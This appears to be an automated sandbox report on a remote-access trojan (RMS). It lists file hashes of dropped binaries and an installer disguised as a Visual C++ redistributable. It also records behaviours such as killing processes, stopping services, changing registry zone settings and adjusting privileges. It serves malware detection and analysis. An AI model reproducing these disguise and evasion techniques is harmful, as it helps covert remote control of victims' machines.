SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1632-167-0x0000000000240000-0x0000000000241000-memory.dmp

memory/628-168-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1052-169-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

memory/1628-188-0x0000000000240000-0x0000000000241000-memory.dmp

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1280-193-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1420-197-0x0000000000240000-0x0000000000241000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 14:45

Reported

2022-01-28 14:59

Platform

win10-en-20211208

Max time kernel

179s

Max time network

210s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\MSIAC54.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AB7AA605-500F-4153-8207-FB5563419112} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77a36e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f77a36b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77a36b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB4D1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
